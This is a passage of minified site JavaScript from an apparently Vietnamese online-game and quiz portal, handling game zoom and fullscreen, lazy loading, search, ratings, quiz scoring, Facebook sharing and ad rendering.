t=gamebox.osize.width,n=3;t<=1258&&(n=2);t<=958&&(n=1);t<=648&&(n=0);t<=468&&(n=-1);gamebox.zoom(n,!0);gamebox.scrollTo($("#playbox").offset().top)},scrollTo:function(n){$("html, body").animate({scrollTop:n},1e3)},tick:function(){gamebox.advertisingpercent<100?($("#loadingheader #loadingtick").html("Đang tải "+gamebox.advertisingpercent+"%"),gamebox.timeoutid=window.setTimeout(gamebox.tick,gamebox.advertisingseconds*10)):(gamebox.closeadvertising(),window.clearTimeout(gamebox.timeoutid));gamebox.advertisingpercent+=1},switchLight:function(n){$("body").toggleClass("nightmode");$("body").hasClass("nightmode")&&gamebox.scrollTo($("#playbox").offset().top);$("#lightscreen").toggleClass("on");n&&n.preventDefault()},reload:function(){var n=$("#playbox>#gameobj").html();$("#playbox>#gameobj").html("");$("#playbox>#gameobj").html(n)},savefavorite:function(){$("#favorite").addClass("saved").unbind("click");$.post("/games/services/savefavorite",{gameId:$(".postbox").attr("data-itemid")},function(n){alert(n)},"json")},exitfullscreen:function(){document.exitFullscreen?document.exitFullscreen():document.webkitExitFullscreen?document.webkitExitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.msExitFullscreen&&document.msExitFullscreen()},fullscreen:function(){var n=document.getElementById("playbox");n.requestFullscreen?n.requestFullscreen():n.msRequestFullscreen?n.msRequestFullscreen():n.mozRequestFullScreen?n.mozRequestFullScreen():n.webkitRequestFullscreen&&n.webkitRequestFullscreen();parseInt($("#gamebox").attr("data-resizeable"))!=2&&gamebox.full()},getVersions:function(){var i,r=navigator.userAgent,t,n=r.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i)||[];return/trident/i.test(n[1])&&(t=/\brv[ :]+(\d+)/g.exec(r)||[],i=["IE ",t[1]||""]),n[1]==="Chrome"&&(t=r.match(/\b(OPR|Edge)\/(\d+)/),t!=null&&(i=t.slice(1).join(" ").replace("OPR","Opera"))),n=n[2]?[n[1],n[2]]:[navigator.appName,navigator.appVersion,"-?"],(t=r.match(/version\/(\d+)/i))!=null&&n.splice(1,1,t[1]),i=n.join(" "),i.split(" ")},flashNotify:function(){var n=gamebox.getVersions();if(n[0]=="Chrome"||n[0]=="Opera")$(".missing a[href^='https://get.adobe.com/flashplayer']").on("click",function(){var n=$("#flashnotify");n.length==0&&(n=$("<div id='flashnotify' class='overlay' style='display:none'><b>Nhấn vào nút Allow (Cho phép) để chơi<\/b><\/div>").appendTo("body").click(function(){n.hide()}));n.show()})}};$(function(){var t=function(){document.webkitIsFullScreen||document.mozFullScreen||document.msFullscreenElement||gamebox.resetzoom()},i,n;document.addEventListener&&(document.addEventListener("webkitfullscreenchange",t,!1),document.addEventListener("mozfullscreenchange",t,!1),document.addEventListener("fullscreenchange",t,!1),document.addEventListener("MSFullscreenChange",t,!1));$("#gamebox").length>0&&(gamebox.osize==null&&(gamebox.osize={width:$("#playbox").width(),height:$("#playbox").height()}),i=$("<div id='nightoverlay' class='overlay night'><\/div>"),i.hide().appendTo("body").click(gamebox.switchLight),$("#zoomin").click(function(){gamebox.zoom(gamebox.value+1)}),$("#zoomout").click(function(){gamebox.zoom(gamebox.value-1)}),$("#lightscreen").click(gamebox.switchLight),$("#zoomreset").click(gamebox.resetzoom),$("#zoomfit").click(gamebox.zoomfit),$("#reload").click(gamebox.reload),$("#favorite").click(gamebox.savefavorite),n=gamebox.getVersions(),(n[0]=="Firefox"&&parseInt(n[1])>50||n[0]=="Chrome"||n[0]=="Edge")&&($("<a id='exitfullscreen' title='Thoát khỏi chế độ toàn màn hình'>Thoát<\/a>").appendTo("#playbox"),$("#zoomfull").click(function(){gamebox.fullscreen();$("#exitfullscreen").click(function(){$(this).unbind("click");$("#gameplayer").removeClass("zoomGame");gamebox.exitfullscreen()})}),$("#zoomfull").removeClass("hide")),gamebox.flashNotify())});window.yall=function(n){var u=function(n){if("IMG"===n.tagName){var i=n.parentNode;"PICTURE"===i.tagName&&[].slice.call(i.querySelectorAll("source")).forEach(function(n){return f(n)});f(n)}"VIDEO"===n.tagName&&([].slice.call(n.querySelectorAll("source")).forEach(function(n){return f(n)}),f(n),!0===n.autoplay&&n.load());"IFRAME"===n.tagName&&(n.src=n.dataset.src,n.removeAttribute("data-src"));n.classList.contains(t.lazyBackgroundClass)&&(n.classList.remove(t.lazyBackgroundClass),n.classList.add(t.lazyBackgroundLoaded))},f=function(n){for(var t in n.dataset)-1!==r.acceptedDataAttributes.indexOf("data-"+t)&&(n.setAttribute(t,n.dataset[t]),n.removeAttribute("data-"+t))},e=function c(){var n=!1;!1===n&&0<i.length&&(n=!0,setTimeout(function(){i.forEach(function(n){n.getBoundingClientRect().top<=window.innerHeight+t.threshold&&n.getBoundingClientRect().bottom>=-t.threshold&&"none"!==getComputedStyle(n).display&&(!0===t.idlyLoad&&!0===r.idleCallbackSupport?requestIdleCallback(function(){u(n)},h):u(n),n.classList.remove(t.lazyClass),i=i.filter(function(t){return t!==n}))});n=!1;0===i.length&&!1===t.observeChanges&&r.eventsToBind.forEach(function(n){return n[0].removeEventListener(n[1],c)})},t.throttleTime))},r={intersectionObserverSupport:"IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype,mutationObserverSupport:"MutationObserver"in window,idleCallbackSupport:"requestIdleCallback"in window,ignoredImgAttributes:["data-src","data-sizes","data-media","data-srcset","src","srcset"],acceptedDataAttributes:["data-src","data-sizes","data-media","data-srcset","data-poster"],eventsToBind:[[document,"scroll"],[document,"touchmove"],[window,"resize"],[window,"orientationchange"]]},t=_extends({lazyClass:"lazy",lazyBackgroundClass:"lazy-bg",lazyBackgroundLoaded:"lazy-bg-loaded",throttleTime:200,idlyLoad:!1,idleLoadTimeout:100,threshold:200,observeChanges:!1,observeRootSelector:"body",mutationObserverOptions:{childList:!0}},n),s="img."+t.lazyClass+",video."+t.lazyClass+",iframe."+t.lazyClass+",."+t.lazyBackgroundClass,h={timeout:t.idleLoadTimeout},i=[].slice.call(document.querySelectorAll(s)),o;!0===r.intersectionObserverSupport?(o=new IntersectionObserver(function(n,f){n.forEach(function(n){if(!0===n.isIntersecting||0<n.intersectionRatio){var e=n.target;!0===t.idlyLoad&&!0===r.idleCallbackSupport?requestIdleCallback(function(){return u(e)},h):u(e);e.classList.remove(t.lazyClass);f.unobserve(e);i=i.filter(function(n){return n!==e})}})},{rootMargin:t.threshold+"px 0%"}),i.forEach(function(n){return o.observe(n)})):(r.eventsToBind.forEach(function(n){return n[0].addEventListener(n[1],e)}),e());!0===r.mutationObserverSupport&&!0===t.observeChanges&&new MutationObserver(function(n){return n.forEach(function(){[].slice.call(document.querySelectorAll(s)).forEach(function(n){-1===i.indexOf(n)&&(i.push(n),!0===r.intersectionObserverSupport?o.observe(n):e())})})}).observe(document.querySelector(t.observeRootSelector),t.mutationObserverOptions)};$(function(){var t=$("body"),r=$(window),v=$("<div class='overlay'><\/div>").appendTo("body"),e=parseInt($(".theme.game .postbox .rating").attr("data-itemid")),c,s,o,h,n,u,i,l;if(yall({observeChanges:!0}),c=function(n){for(var i,r,t=n.length-1;t>=0;t--)i=Math.floor(Math.random()*t),r=n[i],n[i]=n[t],n[t]=r;return n},$(".mainnav .viewall").hover(function(n){$(".mainnav").addClass("showall");n.preventDefault()}),$(".mainnav .categories, .mainnav").mouseleave(function(n){$(".mainnav").removeClass("showall");n.preventDefault()}),s=$(".searchbox>form>#q"),s.length>0)try{s.autocomplete({delay:600,source:function(n,t){$.post("/timkiem/",{q:n.term,datatype:"json",count:12},function(n){var i=[];$.each(n.Taxonomies,function(n,t){var r={Name:t.Name,Type:"Taxonomy",Slug:t.Slug+"/games",ThumbnailUrl:t.ThumbnailUrl,TotalViews:"Chuyên mục"};i.push(r)});$.each(n.Games,function(n,t){var r={Name:t.Name,Type:"Game",Slug:t.Slug+"/game",ThumbnailUrl:t.ThumbnailUrl,TotalViews:t.TotalViews};i.push(r)});t($.map(i,function(n){return{label:n.Name,value:n.Name,slug:n.Slug,image:n.ThumbnailUrl,view:n.TotalViews}}))},"json")},minLength:2,select:function(n,t){window.location="/"+t.item.slug}}).autocomplete("instance")._renderItem=function(n,t){return $("<li>").append("<table><tbody><tr><td style='width:32px;height:32px' ><a style='height:32px' class='clearfix' href='/"+t.slug+"'><img src='"+t.image+"'/><\/a><\/td><td style='padding-left:5px;max-width:243px'><span>"+t.label+"<\/span><\/td><td class='textSearch' style='text-align:right;width:81px;'>"+t.view.toLocaleString()+"<\/td><\/tr><\/tbody><\/table>").appendTo(n)}}catch(y){console&&$.isFunction(console.log)&&console.log(y.message)}typeof $.fn.slick=="function"&&$(".slider>.slides").slick({dots:!0,autoplay:!0,arrows:!0,autoplaySpeed:2e3,pauseOnFocus:!1,pauseOnHover:!0,pauseOnDotsHover:!1,variableWidth:!0});v.on("click touchstart",function(n){t.removeClass("showsearch showmenu showuser");document.activeElement.blur();n.preventDefault()});if($("<a class='scrolltop'><\/a>").appendTo(t).click(function(n){$("html, body").animate({scrollTop:0},1e3);n.preventDefault()}),o=r.scrollTop(),r.scroll(function(){var n=r.scrollTop();o>n&&!t.hasClass("scrollup")&&(t.addClass("scrollup"),t.removeClass("scrolldown"));o<n&&!t.hasClass("scrolldown")&&(t.addClass("scrolldown"),t.removeClass("scrollup"));r.scrollTop()===0&&t.removeClass("scrollup scrolldown");r.scrollTop()+r.height()===$(document).height();o=n}),$.get("/account/navigation",function(n){if($(n).first().is("[data-loaded]")){$(".header .account").html(n);$(".topnav .user-info").on("touchend",function(n){n.preventDefault();t.toggleClass("showuser")});if($(n).hasClass("user-info")&&($.getScript("/account/so.ashx"),typeof localStorage=="object"&&$(".user-info").attr("data-uid")>0))try{localStorage.uid=$(".user-info").attr("data-uid")}catch(n){console.log(n)}}}),e>0&&($.post("/games/services/track",{gameid:e,type:"Views"}),$(window).bind("beforeunload",function(){$.ajax({url:"/games/services/exitgame",type:"POST",async:!1,data:{gameId:e}})}),typeof $.fn.starrr=="function")){h=function(n,t){parseInt(t)>0&&($.post("/games/services/rate",{gameid:n,value:t}),alert("Cám ơn bạn đã đánh giá "+t+" sao"),$(".histogram-table>[data-rating-value],.rating").off("click"))};$(".rating[data-rating]").empty().starrr({rating:$(".rating").attr("data-rating"),change:function(n,t){h(e,t)}});$(".histogram-table>[data-rating-value]").on("click",function(){var n=$(this).attr("data-rating-value");h(e,n)})}if($("div[data-ajax]").each(function(){var n=$(this),t=n.attr("data-ajax");$.get(t,function(t){$(t).first().is("[data-loaded]")&&n.replaceWith(t)})}),window.fbAsyncInit=function(){FB.init({appId:"1202987593202146",xfbml:!0,version:"v3.2"});FB.AppEvents.logPageView()},function(n,t,i){var r,u=n.getElementsByTagName(t)[0];n.getElementById(i)||(r=n.createElement(t),r.id=i,r.async=!0,r.src="https://connect.facebook.net/vi_VN/sdk.js",u.parentNode.insertBefore(r,u))}(document,"script","facebook-jssdk"),typeof JSON=="object"&&typeof localStorage=="object")try{localStorage.games=localStorage.games?localStorage.games:"[]";n=JSON.parse(localStorage.games);$(".section.postbox").length>0&&setTimeout(function(){var t=$('.ratingbox span[itemprop="photo"]').attr("content"),i=$('.ratingbox span[itemprop="itemreviewed"]').attr("content"),r=location.pathname,u=$(".maincontent .rating").attr("data-itemid"),f;if(t!==undefined&&i!==undefined&&u>0&&$.grep(n,function(n){return n.u===r}).length<=0&&$.grep(n,function(n){return typeof n.n=="string"&&typeof n.u=="string"&&typeof n.p=="string"})){for(f={i:u,u:r,p:t,n:i};n.length>=18;)n.shift();n.push(f);localStorage.games=JSON.stringify(n)}},1e4);n.length<=8&&($(".box.related-games, .box.tag-games").length>0&&$(".related-games .listbox li, .tag-games .listbox li").each(function(){var t=$(this).find("img").attr("src"),u=$(this).find("img").attr("data-src"),i,r,f;if(u!=undefined&&u.length>0&&(t=u),i=$(this).find("a").attr("title"),r=$(this).find("a").attr("href"),t!=undefined&&i!=undefined&&t!==""&&i!==""&&r.length>0&&$.grep(n,function(n){return n.u===r}).length<=0){for(f={p:t,n:i,u:r};n.length>=8;)n.shift();n.push(f)}}),n=n.slice(-17));n.length>=9&&$(".theme.index").length>0&&(u='<div class="box historybox"><div class="inside clearfix"><ul class="listbox clearfix">',i="",$.each(c(n).slice(0,5),function(n,t){var r='<li><a title="'+t.n+'"href="'+t.u+'"><picture class="thumb"><img src="'+t.p+'"/><\/picture><span class="title">'+t.n+"<\/span><\/a><\/li>";i=r+i}),u+=i+"<\/ul><div><\/div>",$(".theme.index>.section #adindextop").after(u));n.length>=9&&$(".theme.game ,.theme.index, .theme.taxonomy").length>0&&(n=n.slice(-9),u='<div class="box history"><a class="heading">Đừng quên chơi thử<\/a><div class="inside"><ul class="listbox clearfix">',i="",$.each(n,function(n,t){var r='<li><a title="'+t.n+'"href="'+t.u+'"><picture class="thumb"><img src="'+t.p+'"/><\/picture><span class="title">'+t.n+"<\/span><\/a><\/li>";i=r+i}),u+=i+"<\/ul><\/div<\/div>",l=window.innerWidth,setTimeout(function(){$(".theme.index .box-sidebar .sidebar .sticky, .theme.taxonomy .box-sidebar .sidebar .sticky").append(u);var n=$(".postbox.box-sidebar .sidebar").height(),t=$(".postbox.box-sidebar .container").height();l>=1024&&t>n&&$(".postbox.box-sidebar .sidebar .sticky").append(u)},6e3))}catch(p){console.log(p)}if(typeof $.fn.stick_in_parent=="function"){var f=$(".box-sidebar .sidebar"),w=$(".theme.index .box-sidebar .sidebar"),a=function(){var n=window.innerWidth,t=$(".box-sidebar .sidebar").height(),i=$(".box-sidebar .container").height();f.length>0&&f.has(".sticky")&&(n>=1024?i>t?(f.css("height",f.parent().height()),f.find(".sticky").stick_in_parent(),console.log("sidebar.sticky_kit:stick_in_parent")):$(".box.history").remove():(f.css("height",""),f.find(".sticky").trigger("sticky_kit:detach"),console.log("sidebar.sticky_kit:detach")))};setTimeout(function(){r.resize(a);a()},7e3)}});$(function(n){var h=typeof canonical=="string"?canonical:location.protocol+"//"+location.hostname+location.pathname,f,r,e,c,u;n(function(n){n(".reset-quiz").on("click",function(){location.href=location.href});n(".item-question.item-choices .list-item,.item-question.item-checkboxes .list-item").on("click",function(){n(".item-question .list-item :not(:selected),.item-question .list-item :not(:checked)").parents(".list-item").removeClass("selected");n(".item-question .list-item :selected,.item-question .list-item :checked").parents(".list-item").addClass("selected")})});var i=1,a=n(".quiz-main").attr("data-quiztype"),s=n(".item-question"),t=n(".quiz-main .quiz-section").length,o=n("#gameview").attr("data-score");if(n(".theme.quizone").length>0){n(".quiz-main .quiz-section").addClass("hide");n(".play-quiz").click(function(){n(".quizone .gameview .playbox").css("height","inherit");n(".quiz-main.textview").css("background","#FFF3E0");n(".total-question").removeClass("hide");n(".quiz-play").addClass("hide");n(".quiz-cover-img").addClass("hide");n(".quiz-main .quiz-section:nth-child(1)").removeClass("hide");n(".quiz-section:not(.hide)").find(".item-question").hasClass("item-checkboxes")&&n(".next-quiz").removeClass("hide");var t=n("#gameplayer").position().top;n("html, body").animate({scrollTop:t},1)});n(".quiz-section input").change(function(){var r=n(this);r.parents("div").hasClass("item-checkboxes")?(n(".quiz-section:not(.hide) input:checkbox:enabled:checked").length>0?(i==t?(n(".check-quiz").removeClass("hide"),n(".check-quiz").removeClass("disabled"),n(".next-quiz").addClass("hide")):i<=t&&n(".next-quiz").removeClass("hide"),n(".next-quiz").removeClass("disabled")):(n(".next-quiz").addClass("disabled"),n(".check-quiz").addClass("disabled")),r.parents(".list-item").find(".answer-desc").toggleClass("color")):n(".next-quiz").addClass("disabled");r.parents("div").hasClass("item-choices")&&(o=="True"?(n(".quiz-section:not(.hide) .item-choices .selected input[data-status='1']").closest("li").addClass("true"),n(".quiz-section:not(.hide) .item-choices .selected input[data-status='0']").closest("li").addClass("false"),n(".quiz-section:not(.hide) .item-choices .list-item input[data-status='1']").closest("li").addClass("true"),r.parents(".quiz-section:not(.hide)").find(".quiz-section-content").addClass("selected"),i==t&&n(".check-quiz").removeClass("hide"),n(".check-quiz").removeClass("disabled"),setTimeout(function(){f()},800)):(i==t&&n(".check-quiz").removeClass("hide"),n(".check-quiz").removeClass("disabled"),f()))});n(".total-question").text("Số câu hỏi: 1/"+t+"");f=function(){if(i=i+1,n(".item-checkboxes").removeClass("wrong"),i<=t){if(n(".quiz-section:not(.hide)").find(".item-checkboxes")){n(".next-quiz").removeClass("hide");var r=n("#gameplayer").position().top;n("html, body").animate({scrollTop:r},1)}n(".quiz-section:not(.hide)").find(".item-choices")&&n(".next-quiz").addClass("hide");n(".quiz-main .quiz-section").addClass("hide");n(".quiz-main .quiz-section:nth-child("+i+")").removeClass("hide");n(".total-question").text("Số câu hỏi: "+i+"/"+t+"")}i==t&&(n(".quiz-section:not(.hide) input:checkbox:enabled:checked").length>0&&(n(".next-quiz").addClass("hide"),n(".check-quiz").removeClass("hide")),n(".total-question").text("Số câu hỏi: "+t+"/"+t+""))};n(".next-quiz").click(function(){o=="True"?(n(".next-quiz").closest(".quiz-main").find(".quiz-section:not(.hide) .quiz-section-content").addClass("selected"),n(".quiz-section:not(.hide) .item-checkboxes .selected input[data-status='1']").closest("li").addClass("true"),n(".quiz-section:not(.hide) .item-checkboxes .selected input[data-status='0']").closest("li").addClass("false"),n(".quiz-section:not(.hide) .item-checkboxes .list-item input[data-status='1']").closest("li").addClass("true"),n(".quiz-section input[type=checkbox]").each(function(){var t=n(this);(t.attr("data-status")=="1"&&this.checked==!1||t.attr("data-status")=="0"&&this.checked==!0)&&t.parents(".item-checkboxes").addClass("wrong").parents(".quiz-section").find(".section-note").removeClass("hide")}),setTimeout(function(){f()},800)):f();n(".quiz-section:not(.hide) input:checkbox:enabled:checked").length>0?n(".next-quiz").removeClass("disabled"):n(".next-quiz").addClass("disabled");n(".quiz-section:not(.hide)").find(".item-question").hasClass("item-choices")&&n(".next-quiz").addClass("hide")});r=0;e=0;n(".quiz-section").length>0&&(c=[],u=[],n(".check-quiz").click(function(){var i,f,h,c,l;if(n(".total-question").addClass("hide"),n(".theme.quizone").length>0&&n(".quiz-main .quiz-section").addClass("hide"),i=0,f=0,s.hasClass("item-choices")&&(i=n(".item-choices .selected input[data-status='1']").length),s.hasClass("item-checkboxes")&&(n(".quiz-section input[type=checkbox]").each(function(){var t=n(this);(t.attr("data-status")=="1"&&this.checked==!1||t.attr("data-status")=="0"&&this.checked==!0)&&t.parents(".item-checkboxes").addClass("wrong")}),f=n(".item-checkboxes:not(.wrong)").length),totalTrue=i+f,console.log("Câu đúng:",totalTrue),n(".list-item.selected input").each(function(){r=r+parseFloat(n(this).attr("data-point"))}),n(".list-item input").each(function(){e=e+parseFloat(n(this).attr("data-point"))}),console.log("điểm tổng:",e),r>=0){a();o=="True"&&(h='<div class="totalScore"><span>Bạn đã trả lời đúng được '+totalTrue+"/"+t+" Câu hỏi.<\/span><span> Số điểm bạn đạt được: "+r+"/"+e+" điểm.<\/span><\/div>",c=n(".item-checkpoint:not(.hide) img").attr("src"),typeof c!="undefined"?n(h).insertAfter(".quiz-check-review-img"):n(".quiz-result").append(h));n(".reset-quiz").removeClass("hide");function a(){if(n(".item-checkpoint").each(function(){u.push(n(this).attr("data-point"))}),u!=null&&u!="")if(u=u.map(Number),u.includes(r)&&r>=0)n(".item-checkpoint[data-point='"+r+"']").removeClass("hide").parent().removeClass("hide");else{var i=u.filter(function(n){return n<r}),t=Math.max.apply(Math,i);console.log("found "+t);n(".item-checkpoint[data-point='"+t+"']").removeClass("hide").parent().removeClass("hide")}}}n(this).addClass("hide");n(".share-quiz").removeClass("hide");n(".quiz-result").css("padding-bottom","0");n(".quiz-main.textview").css("background","inherit");l=n("#gameplayer").position().top;n("html, body").animate({scrollTop:l},100)}));n(".share-quiz").click(function(){var t=n(".item-checkpoint:not(.hide) span").text(),i=parseInt(n(".theme.game .postbox .rating").attr("data-itemid")),u=i+"|"+r,f=window.btoa(u),e=typeof canonical=="string"?canonical:location.protocol+"//"+location.hostname+location.pathname,o=e+"?s="+f,s=n(".item-checkpoint:not(.hide) .quiz-check-review-desc.textview").text(),h=n(".item-checkpoint:not(.hide) img").attr("src");typeof h!="undefined"?FB.ui({method:"share",href:o,hashtag:"#GameVui",quote:t+s},function(){}):l()});function l(){var t=n(".totalScore span").text(),i=n(".item-checkpoint:not(.hide) .quiz-check-review-desc.textview").text();window.open("https://www.facebook.com/sharer/sharer.php?u="+h+"&quote="+t+i+"&hashtag=%23GameVui")}}});$(function(){var n=parseInt($(".theme.video .video-player>div[data-id]").attr("data-id")),t;n>0&&($.post("/video/track",{videoId:n,type:"Views"}),typeof $.fn.starrr=="function"&&(t=function(t,i){parseInt(i)>0&&($.post("/video/video/rate",{videoId:n,value:i}),alert("Cám ơn bạn đã đánh giá "+i+" sao"),$(".average-rating-stars").off("click"))},$(".average-rating-stars[data-rating]").empty().starrr({rating:$(".average-rating-stars").attr("data-rating"),change:function(i,r){t(n,r)}})))});var AD_TYPE_IMAGE=1,AD_TYPE_TEXT=2,AD_TYPE_FLASH=3,AD_TYPE_HTML=4,AD_TYPE_IFRAME=4,AD_COUNT=0,AD_EX_COUNT=0,AD_SHARING_COUNT=0,AD_POSITION_ORDER=-2,AD_POSITION_RANDOM_CHANGE=-1,AD_POSITION_RANDOM_BLINK=1e3,AD_POSITION_RANDOM_SHOW=0,AD_ROOT_PATH="http://realclick.vn/client/",AD_BLANK_GIF="https://realclick.vn/data/file/b.gif",AD_CLICK_PATH="http://realclick.vn/client/ck/",AD_THIRD_PARTY_CLICK_PATH="http://realclick.vn/client/click/",AD_IS_INSTALL=!0,AD_CSS_CLASS="__ad_spot",AD_DATA=[],__click=!1;MetaNET_AdObject.prototype={renderHTML:function(){var n="",t=this.onclick==""?"onclick=\"__onClick('"+this.name+"')\"":"onclick=\"__onClick('"+this.name+"');"+this.onclick+'"',i=this.onMouseOut==""?"":' onMouseOut="'+this.onMouseOut+'" ',r=this.onMouseOver==""?"":' onMouseOver="'+this.onMouseOver+'" ',f=!1,u;return this.adType==AD_TYPE_IMAGE?n=IS_NO_LINK(this.linkUrl)?"<div><img "+r+" "+i+" src='"+this.imageUrl+"' "+t+" width='"+this.width+"' height='"+this.height+"' border=0><\/div>":"<div><a "+r+" "+i+" href = '"+this.linkUrl+"' "+t+" target='"+this.target+"' id='"+this.Id+"' "+this.cssClass+this.style+"><img src='"+this.imageUrl+"' width='"+this.width+"' height='"+this.height+"' border=0><\/a><\/div>":this.adType==AD_TYPE_FLASH?IS_NO_LINK(this.linkUrl)?n="<div "+r+" "+i+" style='width:"+this.width+"px; height:"+this.height+"px;' id='"+this.Id+"' "+t+"><object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' codebase='http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0' width="+this.width+" height="+this.height+" id='"+this.Id+"_FLASH' align='middle'> <param name='allowScriptAccess' value='sameDomain' /> <param name='movie' value='"+this.imageUrl+"'/> <param name='wmode' value='"+this.wmode+"' /> <param name='linkUrl' value='"+this.linkUrl+"' /> <param name='quality' value='high' /><embed src='"+this.imageUrl+"' quality='high' width="+this.width+" height="+this.height+" id='"+this.Id+"_FLASH' name='"+this.Id+"_FLASH' align='middle' allowScriptAccess='sameDomain' type='application/x-shockwave-flash' wmode='"+this.wmode+"' linkUrl='"+this.linkUrl+"' pluginspage='http://www.macromedia.com/go/getflashplayer' /> <\/object><\/div>":(f=!0,n="<div style='width:"+this.width+"px; height:"+this.height+"px;'><div style='position:relative;width:"+this.width+"px; height:"+this.height+"px;' id='"+this.Id+"'><a "+r+" "+i+" href='"+this.linkUrl+"' "+t+" target='"+this.target+"'><div style='position:absolute; top:0px; left:0px;cursor:pointer;width:"+this.width+"px; height:"+this.height+"px;z-index:1;display:block;background-color:Transparent'><\/div><\/a><div style='position:absolute; top:0px; left:0px;cursor:pointer;width:"+this.width+"px; height:"+this.height+"px;z-index:1;background-color:transparent;"+this.__style+"' "+this.cssClass+"><object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' codebase='http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0' width="+this.width+" height="+this.height+" id='"+this.Id+"_FLASH' align='middle'> <param name='allowScriptAccess' value='sameDomain' /> <param name='movie' value='"+this.imageUrl+"'/> <param name='wmode' value='"+this.wmode+"' /> <param name='linkUrl' value='"+this.linkUrl+"' /> <param name='quality' value='high' /><embed src='"+this.imageUrl+"' quality='high' width="+this.width+" height="+this.height+" id='"+this.Id+"_FLASH' name='"+this.Id+"_FLASH' align='middle' allowScriptAccess='sameDomain' type='application/x-shockwave-flash' wmode='"+this.wmode+"' linkUrl='"+this.linkUrl+"' pluginspage='http://www.macromedia.com/go/getflashplayer' /> <\/object><\/div><\/div><\/div>"):this.adType==AD_TYPE_HTML?n="<div><iframe style='width:"+this.width+"px; height:"+this.height+"px;' height='"+this.height+"' frameborder='0' width='"+this.width+"' scrolling='no' src='"+this.imageUrl+"' marginwidth='0' marginheight='0' vspace='0' hspace='0' allowtransparency='true'><\/iframe><\/div>":(u="<a href = '"+this.linkUrl+"' "+t+" target='"+this.target+"'>",n='<div class="breview-box" '+r+" "+i+' id="'+this.Id+'"><p class="adx-item adx-title">'+u+this.title+'<\/a><\/p><p class="adx-item adx-domain">'+u+this.domain+'<\/a><\/p><div class="adx-body"><p class="adx-item adx-image">'+u+'<img src="'+this.imageUrl+'" border="0" alt=""/><\/a><\/p><div class="adx-item adx-content">'+this.desc+"<\/div><\/div><\/div>"),!f,__click||(n+="<div name='MetaNET_Click' id='MetaNET_Click' style='font-size:0px;line-height:0px;position:absolute;top:0px;left:0px;z-index:2;width:1px;height:1px'><\/div>",__click=!0),__rendered=1,n},show:function(){if(__rendered==1){var n=__getEL(this.Id);n.style.display="inline"}},hide:function(){try{var n=__getEL(this.Id);n.style.display="none"}catch(t){}},renderIn:function(n){var t=__getEL(n);t&&(t.innerHTML=this.renderHTML())}};MetaNET_ExAdObject.prototype={renderHTML:function(){var t=this.widthMin,i=this.heightMin,n;return this.mode==1&&(t=this.widthMin,i=this.heightMax),this.showButtons==!1&&(this.collapseAd.onMouseOver=this.expandFunction,this.expandAd.onMouseOut=this.collapseFunction),n="<div id='"+this.Id+"'><table cellpadding=0 cellspacing=0 border=0><tr><td valign=top id='"+this.Id+"_TD' width="+t+" height="+i+">",n+=this.mode==1?this.expandAd.renderHTML():this.collapseAd.renderHTML(),n+="<\/td><\/tr><\/table>",this.showButtons==!0?(n+=this.mode==1?"<font face='arial,verdana,tahoma' size=1><div class='exAdBtnBar'><a class='expandAdBtn' id='"+this.Id+"__EXPAND' style='display:none' href='javascript:"+this.Id+"__expand();'>M&#7903; r&#7897;ng<\/a><a class='collapseAdBtn' id='"+this.Id+"__COLLAPSE' href='javascript:"+this.Id+"__collapse();'>Thu nh&#7887;<\/a>":"<font face='arial,verdana,tahoma' size=1><div class='exAdBtnBar'><a class='expandAdBtn' id='"+this.Id+"__EXPAND' href='javascript:"+this.Id+"__expand();'>+<\/a><a class='collapseAdBtn' id='"+this.Id+"__COLLAPSE' style='display:none' href='javascript:"+this.Id+"__collapse();'>-<\/a>",n+=" | <a class='closeAdBtn' id='"+this.Id+"__CLOSE' href='javascript:"+this.Id+"__close();'>x<\/a><\/div>",n+="<\/div><\/font>"):(n+=this.mode==1?"<font face='arial,verdana,tahoma' size=1><div style='display:none' class='exAdBtnBar'><a class='expandAdBtn' id='"+this.Id+"__EXPAND' style='display:none' href='javascript:"+this.Id+"__expand();'>M&#7903; r&#7897;ng<\/a><a class='collapseAdBtn' id='"+this.Id+"__COLLAPSE' href='javascript:"+this.Id+"__collapse();'>Thu nh&#7887;<\/a>":"<font face='arial,verdana,tahoma' size=1><div style='display:none' class='exAdBtnBar'><a class='expandAdBtn' id='"+this.Id+"__EXPAND' href='javascript:"+this.Id+"__expand();'>+<\/a><a class='collapseAdBtn' id='"+this.Id+"__COLLAPSE' style='display:none' href='javascript:"+this.Id+"__collapse();'>-<\/a>",n+=" | <a class='closeAdBtn' id='"+this.Id+"__CLOSE' href='javascript:"+this.Id+"__close();'>x<\/a><\/div>",n+="<\/div><\/font>"),n+="<div id='"+this.Id+"_HIDDEN' style='display:none; visiblity:hidden; z-index:-1000;'>",n+=this.mode==1?this.collapseAd.renderHTML():this.expandAd.renderHTML(),n+="<\/div>",__rendered=1,n},show:function(){if(__rendered==1){var n=__getEL(this.Id);n.style.display="inline"}},hide:function(){try{var n=__getEL(this.Id);n.style.display="none"}catch(t){}},renderIn:function(n){var t=__getEL(n);t&&(t.innerHTML=this.renderHTML())}};MetaNET_SharingAdObject.prototype={renderHTML:function(){var n="",t=0,i,r;if(this.length==0)return"";if(this.interval>0){if(n+="<div id='"+this.Id+"'>",this.length>1){for(t=0;t<this.length;t++)n+="<div id='"+this.Id+"_SLIDE_"+t+"' style='display:none;'>",n+=this.adObjects[t].renderHTML(),n+="<\/div>";n+="<script type='text/javascript'>";n+=""+this.Id+"__play();";n+="<\/script>"}return n+="<\/div>",__rendered=1,n}if(this.interval<0){if(i=this.direction.toLowerCase(),i=="doc"||i=="vertical"||i=="d"||i=="0"?i="v":(i=="n"||i=="horizontal"||i=="ngang"||i=="1")&&(i="h"),n+="<div id='"+this.Id+"'>",n+='<div class="adx-zone">',i=="h"){for(n+='<div class="adx-row">',t=0;t<this.length;t++)n+='<div class="adx-cell">',n+=this.adObjects[t].renderHTML(),n+="<\/div>",this.padding>0&&t<this.length-1&&(n+='<div style="width:'+this.padding+'px" class="adx-sep-h"><\/div>');n+="<\/div>"}else if(i=="v")for(t=0;t<this.length;t++)n+='<div class="adx-row"><div 